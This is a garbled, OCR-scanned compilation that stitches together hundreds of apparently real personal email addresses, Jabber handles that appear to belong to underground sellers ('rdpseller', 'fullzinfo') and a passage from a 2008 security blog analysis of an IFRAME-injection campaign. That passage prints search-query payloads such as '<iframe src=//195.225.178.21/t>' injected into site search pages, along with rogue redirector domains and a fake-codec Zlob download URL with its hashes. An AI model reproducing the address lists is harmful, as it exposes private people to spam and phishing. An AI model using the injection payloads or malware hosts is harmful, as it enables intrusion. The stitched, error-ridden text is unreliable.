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dcox@lowndescounty.com 
rosamaqfiy@gmail.com 
jovan.radojkovic22@gmail.com 
jmakbandara@yahoo.com 
5NH-granti76@gmail.com 
kumori213@gmail.com 
Morganprutsman@yahoo.com 
joan85m@gmail.com 
rileyboy2001@yahoo.com 
dasuits@comcast.net 
cfrazier50@comcast.net 
auckerman34@comcast.net 
capcityent@comcast.net 
amydurrence@gmail.com 
brigitte2005@comcast.net 
dcardinael@gmail.com 
staceydg@hotmail.com 


vitorialemos769@gmail.com 


andreas.saebjoernsen@gmail.com 


steph cooper@hotmail.com 
jaliemowry@yahoo.com 
qweenpossible@aol.com 
derek.tesoro@yahoo.com 
alex.bouneff@gmail.com 
chrisnerosolo@gmail.com 
adam.morales999@yahoo.com 
andrewdbot@gmail.com 
adam.kollar444@gmail.com 
kanwenyang@gmail.com 
juniorantonio8796@gmail.com 
rbu.style@gmail.com 
cody1923@live.com 
sharon.idleman@gmail.com 
cowcop2@yahoo.com 


francesgal@aol.com 
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gam3rshOt@hotmail.co.uk 
grkmom51@aol.com 
antonio7curves@gmail.com 
kocsmy@gmail.com 
Timmymoto@hotmail.com 
STATEShbryant31@gmail.com 
mvbobadilla@hotmail.com 
laginal978@gmail.com 
courtneyabud@gmail.com 
bradholdrenl988@yahoo.com 
edyopgomes@gmail.com 
w33zyf.baby@live.com 
sprice@brownmem.com 
frag1965@msn.com 
2955057@gmail.com 
isabelle.morinl14@wanadoo.fr 
dylan82@ymail.com 
janetg10591@gmail.com 
jangles 524@yahoo.com 
Janiemoore1984@icloud.com 
janine.febres@gmail.com 
jaredlisenby@hotmail.com 
jarrod23king@gmail.com 
smoovoreo@tmail.com 
rodrigoescobar313@yahoo.com 
neal@ruchman.com 
bishopstone@gmail.com 
mhsilv@yahoo.com 

joanna _fleming81@yahoo.com 
shez1962@hotmail.co.uk 
freenme@mchsi.com 
j.paaulinho@live.com 
paulafidelis@msn.com 
ddhaggard@comcast.net 
carlettau@yahoo.com 
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nyen68@gmail.com 
jwilder42@gmail.com 
tomcalvert1@live.co.uk 
cassandrasartaine@yahoo.com 
southernmama212@yahoo.com 
seanmitchelll@comcast.net 
davea70@hotmail.com 
jtm9054@gmail.com 

jor geeO08@yahoo.com 
crisrhcc@yahoo.com 
janiep@live.com.au 
goruzihavi@marketlink.info 
fayozoconi@daymailonline.com 
lovettemachaka@yahoo.com 
niltongunner _@hotmail.com 
Danazahner@web.de 
beetle3501@btinternet.com 
etchenadia@yahoo.fr 
vgjha@yahoo.com 
francisregan _123@yahoo.com 
rachellyurchick@yahoo.com 
marialuzarraga@yahoo.com 
decaire35@gmail.com 
10bnblys@gmail.com 
bettyj.goodwin@gmail.com 
whaley1733@yahoo.com 
mparedesrojas@gmail.com 
mayth@email.uc.edu 
sandbena@charter.net 
missarnott@yahoo.com 
karenkss2@googlemail.com 
casey968@gmail.com 
jocelyn.wyatt@rogers.com 
oliviawalll4@hotmail.com 


kwhitton92@yahoo.com 
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absboards@gmail.com 

garnet _qiu@hotmail.com 
sjmninja83@yahoo.com 
kendra.beckman@gmail.com 
ariane mayumi@hotmail.com 
fernandavarella@supertrans.com.br 
apokalyps666@gmail.com 
jmjhnsniii@gmail.com 
nygiants2047@aim.com 

casey _aldrich e3@hotmail.com 
fdiaz20@cfl.rr.com 
Israel.labra@yahoo.com 
phoenix050713@gmail.com 
lauren.foreman@hotmail.com 
dsunnrize@aol.com 

gilligan JA@yahoo.com 
daniel.R.Miller1@gmail.com 
scottyisOlL@hotmail.com 
hartjr@yahoo.com 
fgillasoy@mac.com 
Divadrew525@gma.com 
priyankO7cs43@gmail.com 
prashanthole@hotmail.com 
easynikhil@gmail.com 
maaz.ahmad17@gmail.com 
jitendrakangsiya@gmail.com 
ramanjitsingh80@gmail.com 
acamitchauhan607@gmail.com 
vivekparakh@hotmail.com 
portelli.josephine94@gmail.com 
lihangO00@21cn.com 
tuur.vadervee01@gmail.com 
liliana _0o2002@yahoo.com 
dparker115@gmail.com 
davidmaguire96@gmail.com 
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kajuanwatson23@yahoo.com 
christinedelawar@aol.com 
damedric.jacksonl@gmail.com 
Alkasharma0319@gmail.com 
Dravenrocks@gmail.com 


donniegatton@gmail.com 


vinciane.zimmermann@orange.fr 


lylymog@orange.fr 
sullivan.alvarez@orange.fr 
chatelain.mc@wanadoo.fr 


pierre.audiffren@wanadoo.fr 


nadine.gonzalvez@numericable.fr 


moonlightbae@orange.fr 
ebaty@orange.fr 
stivenespinosa@yahoo.com 
tamara.mannweiler@web.de 
jchhean@yahoo.com 
kiull42@gmail.com 
crdepa@gmail.com 
remysolgarenc@gmail.com 
davidfranzini4d@hotmail.com 
rmalr2@hotmail.com 
crispianizoli@yahoo.com.br 
wd1998313@gmail.com 
ratish.prakash@gmail.com 
flmpedro@hotmail.com 
kabrrons@gmail.com 
joselpelaez@gmail.com 
Mattil.sjoblom@gmail.com 
arlanmartinez@yahoo.com 
lacey foster@yahoo.com 
lockinour549@gmail.com 
branislav.cicak@gmail.com 
danielaugustoma@hotmail.com 


alexmoreno1984@hotmail.com 
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chiriacattack@gmail.com 
munnzy@ymail.com 
edslight@gmail.com 
nirgune@yahoo.com 
laurensakoff@yahoo.com 
kspattO8@gmail.com 
kelseyelainemitchell@gmail.com 
ano309@gmail.com 
indians4310@yahoo.com 
mydshaun@yahoo.com 
alexisursula@hotmail.com 
zackmr9@gmail.com 
eugenehan970711@gmail.com 
kelvintul23@gmail.com 
pamsmccray@gmail.com 
aanchaltyagi@gmail.com 
17.himanshu@gmail.com 
vikrant mahale@yahoo.com 
saikatmandal@gmail.com 
vishalp2014p@gmail.com 
sidmohan@gmail.com 
amandaaureliana@gmail.com 
jacqueline.wales1@gmail.com 
demo.user01@hotmail.com 
fergamahunter@gmail.com 
smitty307@hotmail.com 
charlie.henocque@gmail.com 
leducjavierl4@gmail.com 
iturtI3@gmail.com 
jussi@bahnhof.se 
stanislastralbaut@gmail.com 
m.augustson92@hotmail.com 
manuel _tovar97@yahoo.com 
navi 911@hotmail.com 
jaemin.baek@gmail.com 
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tarutsumi@gmail.com 
kuyakawan@gmail.com 
my 1dollarlife@gmail.com 
wyatt67505@gmail.com 
carmelo2818@gmail.com 
tm37398@gmail.com 
nathan@weickonline.net 
brianlink861@yahoo.com 
dpd22saints@yahoo.com 
jtloader@gmail.com 
darkness22ish@gmail.com 
pierichjl!@gmail.com 
ronaldh246@verizon.net 
mrsjohnson1010@gmail.com 
dialarod2@aol.com 
adecker64@gmail.com 
petro _ionut@yahoo.com 
dbeere3@gmail.com 
jeezcrafter@gmail.com 
miles982@gmail.com 
damiang58@gmail.com 
wariodj@gmail.com 
nodeisgod@yahoo.com 
yiwen1987@hotmail.com 
emircanmuhammed@hotmail.com 
summparr@gmail.com 
davidrojas305@gmail.com 
nhhartmann@yahoo.com 
nhatacura@yahoo.com 
Mattl1115@hotmail.com 
satoril04@gmail.com 
surferchoco@msn.com 
pmduran@mail.usf.edu 
Dominiondesign@att.net 


samantha.peiffer@viacom.com 


13501 


lisawhodat@hotmail.com 
Greisdonna@aol.com 
krylonl989@yahoo.com 
ross.m.phillips@gmail.com 
allnationsbb@aol.com 
cardplayer348@yahoo.com 
cpatey11@gmail.com 
daniloguieb@hotmail.com 
skylife me@yahoo.com 
luvcarebears85@yahoo.com 
pepsiguy6@gmail.com 
jessicastone9 2@outlook.com 
oldschoolridesl1@hotmail.com 
j.houle@live.com 
tresak@hotmail.com 
wfair55@aol.com 
la-barbiera@gmx.de 

dr _15757@yahoo.com 
otslovahoodo@gmail.com 
pastore63.mj@gmail.com 
jenellhonore@yahoo.com 
Wrdlarry@aol.com 
buehrig31@aol.com 
dadduck42@hotmail.com 
caroladetoll@hotmail.com 
kkdQ0OO08@auburn.edu 
deaneryosh@gmail.com 
jonimanol@me.com 
michaelwade136@yahoo.com 
fabian.helpenstein@t-online.de 
jclaudiopjunior@gmail.com 
daizhane@icloud.com 
marylin.segura@hotmail.com 
kristine _phillips2002@yahoo.com 
sabrauskaite@yahoo.com 
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The [l]ongoing monitoring of this [2]campaign reveals that [3]the group is continuing [4]to 
expand the campaign, [5]introducing over a hundred new bogus .info domains acting as 
traffic redirection points to the campaigns hardcoded within the secondary redirection point, 
in this case radt.info where a new malware variant of Zlob is attempting to install though an 
ActiveX object. These are the high profile sites targeted by the same group within the past 
48 hours, with number of locally cached and IFRAME injected pages within their search engines : 


NCSU Libraries - lib.ncsu.edu - 372,000 pages 

FullDownloads.us - fulldownloads.us - 13,000 pages 

Central Statistics Office Ireland - cso.ie - 10,300 pages 

DBLife Frontpage - dblife.cs.wisc.edu - 1,130 pages 

School of Mathematics and Statistics - www-history.mcs.st-andrews.ac.uk - 1040 pages 
eHawaii Portal - ehawaii.gov - 992 pages 

The World Clock - timeanddate.com - 944 pages 

Boise State University - boisestate.edu - 471 pages 

The U.S. Administration on Aging (AoA) - aoa.gov - 425 pages 

Gustavus Adolphus College - gustavus.edu - 312 pages 

Internet Archive - archive.org - 261 pages 

Stanford Business School Alumni Association - gsbapps.stanford.edu - 157 pages 
BushTorrent - bushtorrent.com - 147 pages 

ChildCareExchange - ccie.com - 131 pages 

The University of Vermont - uvm.edu - 120 pages 

Hippodrome State Theatre - Gainesville, FL - thehipp.org - 112 pages 

Minnesota State University Mankato - mnsu.edu - 94 pages 

The California Majority Report - camajorityreport.com - 16 pages 

Medicare.gov - medicare.gov - 12 pages 

USAMRIID - usamriid.army.mil - 3 pages 
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sgparras@gmail.com 
linerlefty@hotmail.com 
jkbinsal@gmail.com 
silvestre _cristal@yahoo.com 
natalie.elders@hotmail.co.uk 
Texasfarmlady@gmail.com 
casayson80@yahoo.com 
lyzasalgado@yahoo.com 
theresaalbenze1995@gmail.com 
kevinmshaw@mac.com 
eemsmith91@hotmail.com 
rellis323@gmail.com 
chelsealouisereed@hotmail.co.uk 
txeitx@hotmail.com 
anaperez.empireeastelite@gmail.com 
banksts73@gmail.com 
sphpe@aol.com 
ellieflynn-watterson@hotmail.co.uk 
bgirlmissyd@gmail.com 
dtjens@gmail.com 
251lab122@yahoo.com 
cgoodmanl6@gmail.com 
bazoda@hotmail.com 
astufflet@gmail.com 
bvedson3@gmail.com 
m.meyling@hotmail.com 
bebroach@gmail.com 
pjfolk@att.net 
nouf.al.nh@outlook.com 
testuser 20141217133143193354@chegg.com 
davidnguyen9311@yahoo.com 
erincomino@hotmail.com 
jtlooksharp@gmail.com 
sharihogg@gmail.com 
meaganisqt@yahoo.com 
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aselburg@hotmail.com 
lawrence.jenn@yahoo.com 
pam@performanceproperties.com 
aacasellal7@gmail.com 
huggsteph@yahoo.com 
tish3264@gmail.com 

yami _no _aibou21@yahoo.com 
joragarr@umail.iu.edu 
acaba007@gmail.com 
brupinhatti@gmail.com 
pjamesO00@comcast.net 
makaylamahone096@gmail.com 
aliciarobson _@hotmail.com 
vthomas@student.hondros.edu 
angber61@yahoo.com 
ash213ban@hotmail.com 
arq.larissa.soares@gmail.com 
lexiebeccue@gmail.com 

pa5 prod _automation1302828781@chegg.com 
nelvin898@gmail.com 
tyrepowerrosebud@gmail.com 
aashifr@hotmail.com 
binneydee@aol.com 
kspebbles2000@yahoo.com 

lil china@me.com 
lillisaliddy@hotmail.co.uk 
david.geller97@gmail.com 
k.touhey@me.com 
jmctmichael@yahoo.com 
tjholt15@hotmail.com 
mouragirl0l1@gmail.com 
killrdie@gmail.com 
bradley1019@gmail.com 
jcarlson@stthomas.edu 


blonxxbby@hotmail.com 
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lady dimps@yahoo.co.uk 
yura.malamura@gmail.com 
cq57@nova.edu 
anitili@gmx.de 
mvazquez010@aol.com 
lourdes13@roadrunner.com 
alpoe@fidnet.com 
claireisapenguin47@gmail.com 
pattylabas@gmail.com 
liubou@yahoo.com 
kobrien369@gmail.com 
upbeqtmusic2009@gmail.com 
cs3182@columbia.edu 
crowriverrapids@aol.com 
mistay1323@sbcglobal.net 
dannaq4@aol.com 
dbenoitQ0@gmail.com 
langbryan@gmail.com 
pnguye24@spsu.edu 
teahmann1l@gmail.com 
hwright@welchstatebank.com 
ratterrrierluver@gmail.com 
mkstidham@att.net 
ateeqabid1@gmail.com 
cgardner30@student.alamo.edu 
lourdesdesposito@hotmail.com 
jorgeprado20@gmail.com 
plombardich@gmail.com 
mullenkelsey115@yahoo.com 
bbarman83@gmail.com 
beckistan@hotmail.com 
jaibhairavtex@yahoo.com 

jodi _levesque@yahoo.ca 
oliver.claire@pdx.edu 
ECHO177@AOL.com 
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bextal256@yahoo.co.uk 
barbara@riggs.me.uk 
pphatwar1995@gmail.com 
mamatha.thiram@gmail.com 
brookeanabel22@hotmail.com 
maggyvl@hotmail.co.uk 
sarahevedesboisl@yahoo.ca 
adam.vue22@hotmail.com 
khalila2476@yahoo.com 
schaarhout@gmail.com 
nmayth@email.uc.edu 
nsandbena@charter.net 
nmissarnott@yahoo.com 
nkarenkss2@googlemail.com 
ncasey968@gmail.com 
njocelyn.wyatt@rogers.com 
noliviawalll14@hotmail.com 
nkwhitton92@yahoo.com 
nmarylin.segura@hotmail.com 
nkristine _phillips2002@yahoo.com 
nsabrauskaite@yahoo.com 
nsgparras@gmail.com 
nlinerlefty@hotmail.com 
njkbinsal@gmail.com 
nsilvestre _cristal@yahoo.com 
nnatalie.elders@hotmail.co.uk 
nTexasfarmlady@gmail.com 
ncasayson80@yahoo.com 
nlyzasalgado@yahoo.com 
ntheresaalbenze1995@gmail.com 
nkevinmshaw@mac.com 
neemsmith91@hotmail.com 
nrellis323@gmail.com 
nchelsealouisereed@hotmail.co.uk 
ntxeitx@hotmail.com 
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nanaperez.empireeastelite@gmail.com 
nbanksts73@gmail.com 
nsphpe@aol.com 
nellieflynn-watterson@hotmail.co.uk 
nbgirlmissyd@gmail.com 
ndtjens@gmail.com 
n251lab122@yahoo.com 
ncgoodman1l6@gmail.com 
nbazoda@hotmail.com 
nastufflet@gmail.com 
nbvedson3@gmail.com 
nm.meyling@hotmail.com 
nbebroach@gmail.com 
npjfolk@att.net 
nnouf.al.h@outlook.com 

ntestuser 20141217133143193354@chegg.com 
ndavidnguyen9311@yahoo.com 
nerincomino@hotmail.com 
njtlooksharp@gmail.com 
nsharihogg@gmail.com 
nmeaganisqt@yahoo.com 
naselburg@hotmail.com 
nlawrence.jenn@yahoo.com 
npam@performanceproperties.com 
naacasellal7@gmail.com 
nhuggsteph@yahoo.com 
ntish3264@gmail.com 

nyami _no _aibou21@yahoo.com 
njoragarr@umail.iu.edu 
nacaba007@gmail.com 
nbrupinhatti@gmail.com 
npjamesOO0O0@comcast.net 
nmakaylamahone096@gmail.com 
naliciarobson _@hotmail.com 


nvthomas@student.hondros.edu 
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nangber61@yahoo.com 
nash213ban@hotmail.com 
narq.larissa.soares@gmail.com 
nlexiebeccue@gmail.com 

npa5 prod automation1302828781@chegg.com 
nnelvin898@gmail.com 
ntyrepowerrosebud@gmail.com 
naashifr@hotmail.com 
nbinneydee@aol.com 
nkspebbles2000@yahoo.com 
nlil_ china@me.com 
nlillisaliddy@hotmail.co.uk 
ndavid.geller97@gmail.com 
nk.touhey@me.com 
njmctmichael@yahoo.com 
ntjholt15@hotmail.com 
nmouragirl01@gmail.com 
nkillrdie@gmail.com 
nbradley1019@gmail.com 
njcarlson@stthomas.edu 
nblonxxbby@hotmail.com 
nlady _dimps@yahoo.co.uk 
nyura.malamura@gmail.com 
ncq57@nova.edu 
nanitili@gmx.de 
nmvazquez010@aol.com 
nlourdes13@roadrunner.com 
nalpoe@fidnet.com 
nclaireisapenguin47@gmail.com 
npattylabas@gmail.com 
nliubou@yahoo.com 
nkobrien369@gmail.com 
nupbegtmusic2009@gmail.com 
ncs3182@columbia.edu 
ncrowriverrapids@aol.com 
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nmistay1323@sbcglobal.net 
ndannaq4@aol.com 
ndbenoit90@gmail.com 
nlangbryan@gmail.com 
npnguye24@spsu.edu 
nteahmann1l@gmail.com 
nhwright@welchstatebank.com 
nratterrrierluver@gmail.com 
nmkstidham@att.net 


nateeqabid1@gmail.com 


ncgardner30@student.alamo.edu 


nlourdesdesposito@hotmail.com 
njorgeprado20@gmail.com 
nplombardich@gmail.com 
nmullenkelsey115@yahoo.com 
nbbarman83@gmail.com 
nbeckistan@hotmail.com 
njaibhairavtex@yahoo.com 
njodi _levesque@yahoo.ca 
noliver.claire@pdx.edu 
nECHO177@AOL.com 
nbexta1l256@yahoo.co.uk 
nbarbara@riggs.me.uk 
npphatwar1995@gmail.com 
nmamatha.thiram@gmail.com 
nbrookeanabel22@hotmail.com 
nmaggyvl@hotmail.co.uk 
nsarahevedesboisl1@yahoo.ca 
nadam.vue22@hotmail.com 
nkhalila2476@yahoo.com 
nschaarhout@gmail.com 
sgtpapajoe@aol.com 
arw721@gmail.com 
chace0110@gmail.com 
dylan1323@gmail.com 
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gaedikus@gmail.com 
hilanmeyran@outlook.fr 
joeenhari@yahoo.co.uk 
jord299@hotmail.co.uk 
juliencail@gmail.com 
masterwdang@gmail.com 
melvinkeeO@gmail.com 
mttbissett@yahoo.com 
sean30162@gmail.com 
trevorkozlowski@yahoo.com 
nchace0110@gmail.com 
ndylan1323@gmail.com 
ngaedikus@gmail.com 
nhilanmeyran@outlook.fr 
njoeenhari@yahoo.co.uk 
njord299@hotmail.co.uk 
njuliencail@gmail.com 
nmasterwdang@gmail.com 
nmelvinkeeOQ@gmail.com 
nmttbissett@yahoo.com 
nsean30162@gmail.com 
ntrevorkozlowski@yahoo.com 
gwalsh326@gmail.com 
amberstricek@yahoo.com 
nfrancesgal@aol.com 
ngam3rshOt@hotmail.co.uk 
ngwalsh326@gmail.com 
namberstricek@yahoo.com 
yonko27093@gmail.com 
jdparryl@gmail.com 
tonydpatterson@hotmail.com 
tripp.richard@gmail.com 
desaun@hotmail.com 
larry11207@yahoo.com 
thekesm@gmail.com 
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njtm9054@gmail.com 

njor _gee08@yahoo.com 
ncrisrhcc@yahoo.com 
njdparryl@gmail.com 
ntonydpatterson@hotmail.com 
ntripp.richard@gmail.com 
ndesaun@hotmail.com 
nlarry11207@yahoo.com 
nthekesm@gmail.com 
wi.nicole@yahoo.com 
ndeaneryosh@gmail.com 
njonimanol@me.com 
nmichaelwadel36@yahoo.com 
nfabian.helpenstein@t-online.de 
njclaudiopjunior@gmail.com 
ndaizhane@icloud.com 
nwi.nicole@yahoo.com 
kumser@jabb.im 
support@tumbIr.com 
Deqthienel@yahoo.com 
shinaminsk2015@gmail.com 
Gary.havyny@aol.com 
petermortan1990@gmail.com 
nobody@webshell.com 
groxxy@xmpp.cz 
yourcompany@gmail.com 
andersonmr481@gmail.com 
tmtfamily@exploit.im 
voron-hak@ya.ru 
Vasya@jabber.com 
chemodan@jabbim.com 
endorphin@wwf.tl 
cctobk@protonmail.com 
servallporvallobnall@xmpp.jp 


shangalal@xmpp.jp 
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jedi@jabbim.com 
darkxplanet@gmail.com 
richwitch@jabber.se 
paus144@thesecure. biz 
kopbito@xmpp.jp 
bankboss@jabber.ccc.de 
rockybalqboa@gmail.com 
dev.tenebris@exploit.im 
100100@xmpp.ru 

tenb _admin@xmpp.jp 
bumbeezy@sj.ms 
smertan@gmail.com 
cpa.akiesha@gmail.com 
Ifh533@yahoo.com 
rdpseller@exploit.im 
android88@exploit.im 
mob.proxy99@gmail.com 
heather912@aol.com 
atila@jabbim.cz 
atila@xmpp.jp 
fullzinfo@xmpp.jp 
golovazer@exploit.im 
monti77@dukgo.com 
rams@dlab.im 
skype55@dukgo.com 
sweral00@jabbim.cz 
anders.cc@jabber.root.cz 
1337@procrd.pro 
ronny.pobletep@gmail.com 
jakenk8@gmail.com 
blacknights@gmail.com 
juanlamas18@gmail.com 
patscaldwell@gmail.com 
jobarronl975@gmail.com 
leonidio.borges@gmail.com 
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Search for ‘tramadol <iframe src=//195.225.178.21/t>": FAQ Search... 

Your search - tramadol <iframe sro=//195.225.178.21/> - did not match any frequently asked 
questions. Most Frequently Asked. What is the Citation Builder? ... 

www. lib. ncsu.eduwifag/search, php?q=tramado!l%20%3Ciframe%20src=// 195.225. 178. 21A%3E - 
18k - Cached - Similar pages 


rch for ‘tramadol <IFRAME src=i/1 A “EA rch ... 
Your search - tramadol <IFRAME src=//195.225.178.214> - did not match any frequently 
asked questions. Most Frequently Asked. What is the Citation Builder? ... 
www. lib. nesu.edufag/search. php?q=tramadol+%3CIF RAME %20src=//195.225.178. 21A%3E - 
18k - Cached - Similar 


Search for ‘cialis <IFRAME src=//195.225.178.21/c>" FAQ Search ... 

Your search - cialis <IFRAME sre=//195.225.178.21/c> - did not match any frequently asked 
questions. Most Frequently Asked. What is the Citation Builder? ... 

www lib. ncsu.edu/fag/search, php?q=cialis %20 %3CIF RAME %20sre=//195,225.178.21/c%3E - 
18k - Cached - Similar pages 


Search for ‘phentermine <iframe src=//195.225.178.21/p>" FAQ ... 

Your search - phentermine <iframe src=//195,.225.178,.21/p> - did not match any frequently 
asked questions. Most Frequently Asked ... 

www lib. ncsu.edufag/search. php?q=phentermine %20%3C iframe %20src=// 195.225. 176.21 /p% 
3E - 18k - Cached - Similar pages 


pages 


Search for ‘phentermine <IFRAME src=//195.225.178.21/p>"" FAQ... 

Your search - phentermine <IFRAME srco=//195.225.178.21/p> - did not match any frequently 
asked questions. Most Frequently Asked ... 

www. lib.ncsu.edu/fag/search. php?q=phentermine%20%3CIF RAME% 
2Osrc=//195.225.178.21/p%3E - 18k - Cached - Similar pages 


Search for Viagra «IFRAME srce=//195.225.178.21/v>": FAQ Search... 

Your search - viagra <IFRAME src=//195.225.178.21/v> - did not match any frequently asked 
questions. Most Frequently Asked. What is the Citation Builder? ... 

www. lib.ncsu.edufag/search, php? q=viagra %20 %3CIFRAME %20src=//195, 225.178. 214°%3E - 
18k - Cached - Similar pages 


Search for cialis <iframe src=//195.226.178.21/c>": FAQ Search... 

Your search - cialis <iframe sre=//195.225.178.21/c> - did not match any frequently asked 
questions. Most Frequently Asked. What is the Citation Builder? ... 

www lib.ncsu.edu/fag/search. php?q=cialis %20%3Ciframe %20sre=//195,. 225. 178.21/6%3E - 
18k - Cached - Similar pages 


Search for ‘free ringtones download free ringtones <iframe src ... 

Matches for: free ringtones download free ringtones <iframe src=//195.225.178.21/r>, Why 
cant | open the file after! download a data set from ICPSR? ... 

www lib.ncsu.edul...//195,225.178.21/r%3E - 16k - Cached - Similar pages 


Search for ‘free ringtones download free ringtones <IFRAME src ... 

Matches for: free ringtones download free ringtones <IFRAME sro=//195.225.178.21/r>. Why 
cant | open the file after | download a data set from ICPSR? ... 

www. lib. ncsu.edu/...//195.225.178.21/r%3E - 16k - Cached - Similar pages 


Search for ‘verity records <IFRAME src=//195.225.178.21/5>" FAQ... 


This sample of the newly introduced .info domains reside on the same netblock as the previous 
ones - 75.125.181.0/255 a KISS strategy making it easier to respond to this incident. Best of 
all, they further expand the campaign since they’re injected in plain text, next to javascript 
obfuscated, this time embedded malware : 


hickey.info 


kbst.info 


sezejc.info 


mloqrd.info 
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punkrawkchef@gmail.com 
nmartinl199@gmail.com 
userturbo@jabber.cz 
donghong@jabbim.com 
dunadanswest@gmail.com 
489452@jabme.de 
alphalocker@exploit.im 
support@altvpn.com 
golls@xmpp.jp 
gtr33@exploit.im 
aminesia@jabbim.com 
amnesia@jabbim.com 
callypsso@jabberes.org 
kaleoko1@jabber.ru 
Aviabox@xmpp.jp 
iezax@yandex.ru 
crOk@exploit.im 
logfactory@exploit.im 
ucv@exploit.im 
dorkyhot@xmpp.jp 
ganebal@linux.pl 
biggie-banks@exploit.im 
toprzdbonus@xmpp.jp 
kinoshka@zloy.im 
taisiya@jabbim.com 
ord7nar7a@xmpp.jp 
ordi7@yax.im 
boosk@exploit.im 
chantal29@t-online.de 
2256735@inbox.im 
diego222@xmpp.jp 
n31sOn@securejabber.me 
roy _ann@bigpond.com 
tinagrelli@hotmail.com 


Cquengh@gmail.com 
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ingrid.jonnston@ualberta.ca 
Lise@lovebugs.dk 
sp@10-12.dk 
olcsika@freemail.hu 
tarmal83@gmail.com 
tahnoon.alnehayan@gmail.com 
peto.ce@gmail.com 
dleavert@gmail.com 
che1486@exploit.im 
belmiw@yandex.ru 
kondorfor@jabb.im 
ty-ty@darkdna.net 
shiva-syndicate@darkjabber.cc 
carbon.vinil@xmpp.jp 
konet@jabb.im 
sellbank@mail.ru 
aqua@codingteam.net 
atmooo@codingteam.net 
besstia@codingteam.net 
nikitosik@afera.li 
labelservice@xmpp.jp 
reservel@securejabber.me 
seltik@jabbim.com 
semuel7@exploit.im 
smtpsrvs@exploit.im 
mypersonaldriver@exploit.im 
doodles@wwh.so 
sizil008@xmpp.jp 
bakntk@pandion.im 
RRSport@xmpp.jp 
jjcc@jabb.im 
emilio666@securejabber.me 
emilio666@zloy.im 
ebomb@xmpp.jp 
edall@xmpp.jp 
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engels@sj.ms 
pufick@jabbim.cz 
euship@default.rs 
actor@exploit.im 
actororiginal@protonmail.com 
planetmoney@jabbim.cz 
jabber@jabber.ru 
foto-radikal@exploit.im 
ninjakid@procrd.pro 
dr.gaspar@jabb.im 
dr.gaspar@pandion.im 
genrifox@zloy.im 
google adwords@xmpp.jp 
112234@exploit.im 
112244@xmpp.jp 
grechenkov@prv.name 
cy74@exploit.im 
OrderServisec@gmail.com 
avice@gmail.com 
goodbuyer@1jabber.com 
goodbuyer777@protonmail.com 
sweeetsweet@default.rs 
sweeets@exploit.im 
aurelioooooo@yahoo.com 
340065@exploit.im 
zig-zag@exploit.im 
astra@jaim.at 
criscris777@protonmail.com 
criscris@exploit.im 
oldmanovago@gmail.com 
is@sj.ms 
gordonblek1@xmpp.jp 
vetaal@exploit.im 
ghrpcmwethe@torbox3uiot6wchz.onion 
BlackBandit@jabber.de 
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badwood@xmpp.jp 
DarkGod@exploit.im 
usastuff@xmpp.jp 
unitedstatesamericastuff@gmail.com 
the bro@xmpp.jp 
thelastemperor@exploit.im 
voltaer@jabbim.sk 
zamkovserj@tutanota.com 
fitotop@jodo.im 
jjcc@jabb.in 
GrantKordinal@jabber.ru 
yyamal154@gmail.com 
sofia _revenge@exploit.im 
blade _runner@1jabber.com 
Gobl888@darkjabber.cc 
Mr.Black@wtfismyip.com 
okdok@sj.ms 
andrygood@xmpp.jp 
voleshuk@xabber.org 
harry123@monopoly.cc 
roddi@xabber.org 
icehand@jabber.ru 
alex1586@mail.ru 
bstndpp@xmpp.jp 
jowhite@exploit.im 
sachko@exploit.im 
zloybr@jabbim.pl 
sber@jabbim.cz 
Pardus1@xmpp.jp 
mirro75@mail.com 
ivanovsergej107@gmail.com 
bmw750@exploit.im 
codes@codingteam.net 
Qasix@exploit.im 
dfd100@jabbim.cz 

13516 


jklno@default.rs 
realshadowjoker@xmpp.jp 
kauhywkasim@xmpp.jp 
igortoprol@mail.ru 
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cgjttz.info 
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kbsxet.info 


Each of the these is loading a secondary domain, which is then taking us to two more before 
finally reaching the Zlob variant. In this case it’s radt.info (75.125.208.243) with several 
Campaigns currently up and running, pointing to the same fake codec. And the samples 
redirects upon visiting these as follows : 


seivomerutam.info/Free-Paris-Hilton-Nude-Pics/ 
seivomerutam.info/spam/ 


all of which ultimately redirect to : 


porn-popular.com (64.28.185.78) where the Zlob variant in the face of a fake codec, is 
downloaded from democodec.com/download/ democodec1292.exe (64.28.184.168) via an 
Active X object. 
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Video ActiveX Otgect Error! 


Scanner results : 22 % Scanner(8/36) found malware! 


File Name : democodec1292.exe 


File Size : 74823 byte 


MD5 : 30965fdbd893990dd24abda2285d9edc 
SHAI : 53eacbb9cdf42394bd455d9bd2275f05730332f7 


Downloader.Zlob.ZV; Trojan-Downloader.Win32.Zlob.eie; TrojanDownloader.Zlob.epx 


It gets even more interesting as according to [6]Computer Associates : 


"This fake codec is actually a hijacker that will change your DNS settings whether you are 
aquire your IP settings through DHCP or set your IP information manually. This hijacker will 
attempt to re-route all your DNS queries through 85.255.x.29 or 85.255.x.121. If you use a 
static IP address, CA AntiSpyware will set your DNS server to 198.6.1.1 to prevent your DNS 
queries from continuing to go through the rogue DNS servers. Please change your DNS server 
to the DNS server provided by your IP or Network Administrator." 
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to most coded videos. 


OVO access is a rreutmedia soMware tat allowa access 1 Windows 
COReCBON Of MUBMEDs Crivers and integrates wih any apptcabon 
using OrectSnow and Mxrosot Video for Windows OVOatcess wil 
highly increase quality of video fies you play 


Terms of use = Contact OVDacess enhances your musk Estening expenence by Improving 


the s0urrd Quality of video fies sound, MP3, intemet rade, Windows 
Media and other music tes Renew stereo Gepth, 304 3D surround 
SOutd, estore sound Clarty, BOOS yout audio levels, afd produte 
deep, nich bass sounds 


What this means is that [7]kKnown Russian Business Network netblocks are receiving all the 
re-routed DNS queries from infected hosts, thereby setting up the foundations for a large scale 
pharming attack by infecting the weakest link, the end user from the perspective of using rogue 
DNS servers, a much more effective but noisy approach. 


To sum up - it’s a mess that I’ll continue trying to structure, and it’s a single group exploiting 
input validation capability within the sites’ search engines we're talking about. With this seg- 
mented targeting of sites with high page ranks, and their persistance, is already positioning 
hundreds of thousands of keywords within the top search results, with the targeted sites are 
acting as the redirectors to the malware locations. 


http: //ddanchev. blogspot .com/2008/03/wiredcom-and-historycom-getting-rbn-ed.htm 


http: //ddanchev. blogspot .com/2008/03/more-cnet-sites-under-iframe-attack.htm 


http: //ddanchev. blogspot .com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed. html 


. http://ddanchev. blogspot .com/2008/03/rogue-rbn- sof tware-pushed- through. htm 


http: //ddanchev. blogspot .com/2008/03/injecting-iframes-by-abusing-input .htm 


. http://ca.com/us/securityadvisor/pest/pest .aspx?id=453119651 
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4.3.11 Embedded Malware at Bloggies Awards Site (2008-03-13 00:24) 


JavaScript\"> 
